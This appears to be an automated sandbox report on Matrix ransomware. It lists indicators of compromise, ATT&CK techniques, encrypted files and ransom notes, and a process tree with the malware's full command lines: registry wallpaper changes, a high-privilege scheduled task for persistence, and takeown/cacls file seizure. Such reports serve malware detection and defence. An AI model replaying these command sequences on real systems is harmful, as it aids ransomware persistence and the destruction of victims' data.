behavioral1/memory/3148-7434-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-7432.dat	upx
behavioral1/memory/3148-7435-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3184-7439-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x0007000000018f0e-7437.dat	upx
behavioral1/files/0x0007000000018f0e-7436.dat	upx
behavioral1/files/0x0007000000018f0e-7440.dat	upx

Drops desktop.ini file(s) 41 IoCs

description	ioc	Process
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\FH0I90TM\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZX8XU28O\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\N5KY6H72\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\XB53WMX1\desktop.ini	MatrixRansomware.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	WzYfqHQn64.exe
File opened (read-only)	\??\P:	MatrixRansomware.exe
File opened (read-only)	\??\O:	MatrixRansomware.exe
File opened (read-only)	\??\N:	MatrixRansomware.exe
File opened (read-only)	\??\G:	MatrixRansomware.exe
File opened (read-only)	\??\L:	WzYfqHQn64.exe
File opened (read-only)	\??\N:	WzYfqHQn64.exe
File opened (read-only)	\??\U:	WzYfqHQn64.exe
File opened (read-only)	\??\Z:	WzYfqHQn64.exe
File opened (read-only)	\??\L:	MatrixRansomware.exe
File opened (read-only)	\??\H:	WzYfqHQn64.exe
File opened (read-only)	\??\T:	WzYfqHQn64.exe
File opened (read-only)	\??\M:	WzYfqHQn64.exe
File opened (read-only)	\??\U:	MatrixRansomware.exe
File opened (read-only)	\??\Q:	MatrixRansomware.exe
File opened (read-only)	\??\K:	MatrixRansomware.exe
File opened (read-only)	\??\J:	MatrixRansomware.exe
File opened (read-only)	\??\E:	MatrixRansomware.exe
File opened (read-only)	\??\B:	WzYfqHQn64.exe
File opened (read-only)	\??\G:	WzYfqHQn64.exe
File opened (read-only)	\??\S:	WzYfqHQn64.exe
File opened (read-only)	\??\V:	WzYfqHQn64.exe
File opened (read-only)	\??\Y:	MatrixRansomware.exe
File opened (read-only)	\??\W:	MatrixRansomware.exe
File opened (read-only)	\??\H:	MatrixRansomware.exe
File opened (read-only)	\??\X:	MatrixRansomware.exe
File opened (read-only)	\??\S:	MatrixRansomware.exe
File opened (read-only)	\??\R:	MatrixRansomware.exe
File opened (read-only)	\??\A:	WzYfqHQn64.exe
File opened (read-only)	\??\E:	WzYfqHQn64.exe
File opened (read-only)	\??\P:	WzYfqHQn64.exe
File opened (read-only)	\??\R:	WzYfqHQn64.exe
File opened (read-only)	\??\M:	MatrixRansomware.exe
File opened (read-only)	\??\I:	MatrixRansomware.exe
File opened (read-only)	\??\K:	WzYfqHQn64.exe
File opened (read-only)	\??\Y:	WzYfqHQn64.exe
File opened (read-only)	\??\J:	WzYfqHQn64.exe
File opened (read-only)	\??\Z:	MatrixRansomware.exe
File opened (read-only)	\??\V:	MatrixRansomware.exe
File opened (read-only)	\??\T:	MatrixRansomware.exe
File opened (read-only)	\??\I:	WzYfqHQn64.exe
File opened (read-only)	\??\O:	WzYfqHQn64.exe
File opened (read-only)	\??\Q:	WzYfqHQn64.exe
File opened (read-only)	\??\X:	WzYfqHQn64.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-722410544-1258951091-1992882075-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\IBj3ndsJ.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui	MatrixRansomware.exe
File opened for modification	C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Helsinki	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Merida	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Luis	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\art\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Singapore	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Jamaica	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Toronto	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\fa.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-13	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo	MatrixRansomware.exe
File opened for modification	C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui	MatrixRansomware.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\en-US\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre7\lib\calendars.properties	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Winnipeg	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pago_Pago	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Antarctica\Troll	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz	MatrixRansomware.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2676	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4956	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1036	WzYfqHQn64.exe
1036	WzYfqHQn64.exe
1036	WzYfqHQn64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1036	WzYfqHQn64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1036	WzYfqHQn64.exe
Token: SeLoadDriverPrivilege	1036	WzYfqHQn64.exe
Token: SeBackupPrivilege	1732	vssvc.exe
Token: SeRestorePrivilege	1732	vssvc.exe
Token: SeAuditPrivilege	1732	vssvc.exe
Token: SeTakeOwnershipPrivilege	2836	takeown.exe
Token: SeTakeOwnershipPrivilege	3124	takeown.exe
Token: SeTakeOwnershipPrivilege	2460	takeown.exe
Token: SeTakeOwnershipPrivilege	3268	takeown.exe
Token: SeTakeOwnershipPrivilege	1928	takeown.exe
Token: SeTakeOwnershipPrivilege	3564	takeown.exe
Token: SeTakeOwnershipPrivilege	3220	takeown.exe
Token: SeTakeOwnershipPrivilege	3280	takeown.exe
Token: SeIncreaseQuotaPrivilege	4780	WMIC.exe
Token: SeSecurityPrivilege	4780	WMIC.exe
Token: SeTakeOwnershipPrivilege	4780	WMIC.exe
Token: SeLoadDriverPrivilege	4780	WMIC.exe
Token: SeSystemProfilePrivilege	4780	WMIC.exe
Token: SeSystemtimePrivilege	4780	WMIC.exe
Token: SeProfSingleProcessPrivilege	4780	WMIC.exe
Token: SeIncBasePriorityPrivilege	4780	WMIC.exe
Token: SeCreatePagefilePrivilege	4780	WMIC.exe
Token: SeBackupPrivilege	4780	WMIC.exe
Token: SeRestorePrivilege	4780	WMIC.exe
Token: SeShutdownPrivilege	4780	WMIC.exe
Token: SeDebugPrivilege	4780	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4780	WMIC.exe
Token: SeRemoteShutdownPrivilege	4780	WMIC.exe
Token: SeUndockPrivilege	4780	WMIC.exe
Token: SeManageVolumePrivilege	4780	WMIC.exe
Token: 33	4780	WMIC.exe
Token: 34	4780	WMIC.exe
Token: 35	4780	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4780	WMIC.exe
Token: SeSecurityPrivilege	4780	WMIC.exe
Token: SeTakeOwnershipPrivilege	4780	WMIC.exe
Token: SeLoadDriverPrivilege	4780	WMIC.exe
Token: SeSystemProfilePrivilege	4780	WMIC.exe
Token: SeSystemtimePrivilege	4780	WMIC.exe
Token: SeProfSingleProcessPrivilege	4780	WMIC.exe
Token: SeIncBasePriorityPrivilege	4780	WMIC.exe
Token: SeCreatePagefilePrivilege	4780	WMIC.exe
Token: SeBackupPrivilege	4780	WMIC.exe
Token: SeRestorePrivilege	4780	WMIC.exe
Token: SeShutdownPrivilege	4780	WMIC.exe
Token: SeDebugPrivilege	4780	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4780	WMIC.exe
Token: SeRemoteShutdownPrivilege	4780	WMIC.exe
Token: SeUndockPrivilege	4780	WMIC.exe
Token: SeManageVolumePrivilege	4780	WMIC.exe
Token: 33	4780	WMIC.exe
Token: 34	4780	WMIC.exe
Token: 35	4780	WMIC.exe
Token: SeTakeOwnershipPrivilege	4200	takeown.exe
Token: SeTakeOwnershipPrivilege	4088	takeown.exe
Token: SeTakeOwnershipPrivilege	1364	takeown.exe
Token: SeTakeOwnershipPrivilege	3648	takeown.exe
Token: SeTakeOwnershipPrivilege	3736	takeown.exe
Token: SeTakeOwnershipPrivilege	2796	takeown.exe
Token: SeTakeOwnershipPrivilege	5084	takeown.exe
Token: SeTakeOwnershipPrivilege	4984	takeown.exe
Token: SeTakeOwnershipPrivilege	3788	takeown.exe
Token: SeTakeOwnershipPrivilege	2352	takeown.exe
Token: SeTakeOwnershipPrivilege	564	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2220 wrote to memory of 2632	2220	MatrixRansomware.exe	29
PID 2220 wrote to memory of 2632	2220	MatrixRansomware.exe	29
PID 2220 wrote to memory of 2632	2220	MatrixRansomware.exe	29
PID 2220 wrote to memory of 2632	2220	MatrixRansomware.exe	29
PID 2220 wrote to memory of 2800	2220	MatrixRansomware.exe	32
PID 2220 wrote to memory of 2800	2220	MatrixRansomware.exe	32
PID 2220 wrote to memory of 2800	2220	MatrixRansomware.exe	32
PID 2220 wrote to memory of 2800	2220	MatrixRansomware.exe	32
PID 2220 wrote to memory of 2944	2220	MatrixRansomware.exe	33
PID 2220 wrote to memory of 2944	2220	MatrixRansomware.exe	33
PID 2220 wrote to memory of 2944	2220	MatrixRansomware.exe	33
PID 2220 wrote to memory of 2944	2220	MatrixRansomware.exe	33
PID 2220 wrote to memory of 2892	2220	MatrixRansomware.exe	34
PID 2220 wrote to memory of 2892	2220	MatrixRansomware.exe	34
PID 2220 wrote to memory of 2892	2220	MatrixRansomware.exe	34
PID 2220 wrote to memory of 2892	2220	MatrixRansomware.exe	34
PID 2944 wrote to memory of 1656	2944	cmd.exe	38
PID 2944 wrote to memory of 1656	2944	cmd.exe	38
PID 2944 wrote to memory of 1656	2944	cmd.exe	38
PID 2944 wrote to memory of 1656	2944	cmd.exe	38
PID 2892 wrote to memory of 2196	2892	cmd.exe	37
PID 2892 wrote to memory of 2196	2892	cmd.exe	37
PID 2892 wrote to memory of 2196	2892	cmd.exe	37
PID 2892 wrote to memory of 2196	2892	cmd.exe	37
PID 2944 wrote to memory of 1436	2944	cmd.exe	39
PID 2944 wrote to memory of 1436	2944	cmd.exe	39
PID 2944 wrote to memory of 1436	2944	cmd.exe	39
PID 2944 wrote to memory of 1436	2944	cmd.exe	39
PID 2944 wrote to memory of 2180	2944	cmd.exe	40
PID 2944 wrote to memory of 2180	2944	cmd.exe	40
PID 2944 wrote to memory of 2180	2944	cmd.exe	40
PID 2944 wrote to memory of 2180	2944	cmd.exe	40
PID 2220 wrote to memory of 2148	2220	MatrixRansomware.exe	42
PID 2220 wrote to memory of 2148	2220	MatrixRansomware.exe	42
PID 2220 wrote to memory of 2148	2220	MatrixRansomware.exe	42
PID 2220 wrote to memory of 2148	2220	MatrixRansomware.exe	42
PID 2148 wrote to memory of 1776	2148	cmd.exe	43
PID 2148 wrote to memory of 1776	2148	cmd.exe	43
PID 2148 wrote to memory of 1776	2148	cmd.exe	43
PID 2148 wrote to memory of 1776	2148	cmd.exe	43
PID 2196 wrote to memory of 2692	2196	wscript.exe	44
PID 2196 wrote to memory of 2692	2196	wscript.exe	44
PID 2196 wrote to memory of 2692	2196	wscript.exe	44
PID 2196 wrote to memory of 2692	2196	wscript.exe	44
PID 2148 wrote to memory of 3064	2148	cmd.exe	46
PID 2148 wrote to memory of 3064	2148	cmd.exe	46
PID 2148 wrote to memory of 3064	2148	cmd.exe	46
PID 2148 wrote to memory of 3064	2148	cmd.exe	46
PID 2692 wrote to memory of 2676	2692	cmd.exe	48
PID 2692 wrote to memory of 2676	2692	cmd.exe	48
PID 2692 wrote to memory of 2676	2692	cmd.exe	48
PID 2692 wrote to memory of 2676	2692	cmd.exe	48
PID 2148 wrote to memory of 1576	2148	cmd.exe	47
PID 2148 wrote to memory of 1576	2148	cmd.exe	47
PID 2148 wrote to memory of 1576	2148	cmd.exe	47
PID 2148 wrote to memory of 1576	2148	cmd.exe	47
PID 1576 wrote to memory of 3544	1576	cmd.exe	51
PID 1576 wrote to memory of 3544	1576	cmd.exe	51
PID 1576 wrote to memory of 3544	1576	cmd.exe	51
PID 1576 wrote to memory of 3544	1576	cmd.exe	51
PID 3544 wrote to memory of 1036	3544	WzYfqHQn.exe	50
PID 3544 wrote to memory of 1036	3544	WzYfqHQn.exe	50
PID 3544 wrote to memory of 1036	3544	WzYfqHQn.exe	50
PID 3544 wrote to memory of 1036	3544	WzYfqHQn.exe	50

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe
"C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\MatrixRansomware.exe" "C:\Users\Admin\AppData\Local\Temp\NWhK2Pn3.exe"
  2⤵
  PID:2632
- C:\Users\Admin\AppData\Local\Temp\NWhK2Pn3.exe
  "C:\Users\Admin\AppData\Local\Temp\NWhK2Pn3.exe" -n
  2⤵
  - Executes dropped EXE
  PID:2800
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IBj3ndsJ.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IBj3ndsJ.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1656
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:2180
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\beo7taho.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\beo7taho.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\po9u17iM.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2692
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\po9u17iM.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:2676
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:5000
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:3412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1576
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:3544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Loads dropped DLL
  PID:1692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1916
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:3260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    PID:3620
